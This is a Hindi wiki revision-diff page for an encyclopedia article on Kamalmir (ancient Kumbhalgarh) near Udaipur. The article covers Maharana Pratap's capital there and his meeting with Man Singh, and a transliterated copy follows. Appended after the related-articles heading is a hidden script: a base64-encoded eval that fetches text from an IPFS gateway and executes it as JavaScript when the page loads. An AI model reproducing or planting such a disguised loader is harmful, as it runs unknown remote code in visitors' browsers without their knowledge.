Difference between revisions of "कमलमीर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "पश्चात " to "पश्चात् ")
 
Line 1: Line 1:
'''कमलमीर''' अथवा '''कमलमेर''' [[उदयपुर]] के निकट 3568 फुट ऊँची पहाड़ी पर बसा हुआ एक ऐतिहासिक स्थान है। कमलमीर में मेवाड़पति [[महाराणा प्रताप]] ने [[हल्दीघाटी]] के युद्ध के पश्चात् अपनी राजधानी बनाई थी। [[चित्तौड़गढ़]] के विध्वंस (1567 ई.) के पश्चात् इनके पिता [[राणा उदयसिंह|उदयसिंह]] ने उदयपुर को अपनी राजधानी बनाया था किंतु प्रताप ने कमलमेर में रहना ही ठीक समझा क्योंकि यह स्थान पहाड़ों से घिरा होने के कारण अधिक सुरक्षित था। कमलमेर की स्थिति को उन्होंने और भी अधिक सुरक्षित करने के लिए पहाड़ी पर कई दुर्ग बनवाए। [[अकबर]] के प्रधान सेनापति आमेर नरेश [[मानसिंह]] और प्रताप की प्रसिद्ध भेंट यहीं हुई थी जिसके बाद मानसिंह रुष्ट होकर चला गया था और [[मुग़ल]] सेना ने [[मेवाड़]] पर चढ़ाई की थी। कमलमेर का प्राचीन नाम [[कुंभलगढ़]] था।  
+
'''कमलमीर''' अथवा '''कमलमेर''' [[उदयपुर]] के निकट 3568 फुट ऊँची पहाड़ी पर बसा हुआ एक ऐतिहासिक स्थान है।  
 +
 
 +
कमलमीर में मेवाड़पति [[महाराणा प्रताप]] ने [[हल्दीघाटी]] के युद्ध के पश्चात् अपनी राजधानी बनाई थी। [[चित्तौड़गढ़]] के विध्वंस (1567 ई.) के पश्चात् इनके [[पिता]] [[राणा उदयसिंह|उदयसिंह]] ने उदयपुर को अपनी राजधानी बनाया था किंतु प्रताप ने '''कमलमेर''' में रहना ही ठीक समझा क्योंकि यह स्थान पहाड़ों से घिरा होने के कारण अधिक सुरक्षित था।  
 +
 
 +
कमलमेर की स्थिति को उन्होंने और भी अधिक सुरक्षित करने के लिए पहाड़ी पर कई [[दुर्ग]] बनवाए। [[अकबर]] के प्रधान सेनापति [[मानसिंह|आमेर नरेश मानसिंह]] और प्रताप की प्रसिद्ध भेंट यहीं हुई थी जिसके बाद मानसिंह रुष्ट होकर चला गया था और [[मुग़ल]] सेना ने [[मेवाड़]] पर चढ़ाई की थी।  
 +
 
 +
कमलमेर का प्राचीन नाम [[कुंभलगढ़]] था।  
  
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 +
*ऐतिहासिक स्थानावली | पृष्ठ संख्या= 137-138| विजयेन्द्र कुमार माथुर |  वैज्ञानिक तथा तकनीकी शब्दावली आयोग | मानव संसाधन विकास मंत्रालय, भारत सरकार
 +
 +
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
Line 10: Line 19:
 
[[Category:उदयपुर]]
 
[[Category:उदयपुर]]
 
[[Category:राजस्थान के ऐतिहासिक स्थान]]
 
[[Category:राजस्थान के ऐतिहासिक स्थान]]
[[Category:ऐतिहासिक स्थान कोश]]
+
[[Category:ऐतिहासिक स्थान कोश]] [[Category:ऐतिहासिक स्थानावली]]
 
__INDEX__
 
__INDEX__

Latest revision as of 07:46, 31 May 2018

kamalamir athava kamalamer udayapur ke nikat 3568 phut ooanchi paha di par basa hua ek aitihasik sthan hai.

kamalamir mean meva dapati maharana pratap ne haldighati ke yuddh ke pashchath apani rajadhani banaee thi. chittau dagadh ke vidhvans (1567 ee.) ke pashchath inake pita udayasianh ne udayapur ko apani rajadhani banaya tha kiantu pratap ne kamalamer mean rahana hi thik samajha kyoanki yah sthan paha doan se ghira hone ke karan adhik surakshit tha.

kamalamer ki sthiti ko unhoanne aur bhi adhik surakshit karane ke lie paha di par kee durg banavae. akabar ke pradhan senapati amer naresh manasianh aur pratap ki prasiddh bheant yahian huee thi jisake bad manasianh rusht hokar chala gaya tha aur mugal sena ne meva d par chadhaee ki thi.

kamalamer ka prachin nam kuanbhalagadh tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  • aitihasik sthanavali | prishth sankhya= 137-138| vijayendr kumar mathur | vaijnanik tatha takaniki shabdavali ayog | manav sansadhan vikas mantralay, bharat sarakar


sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>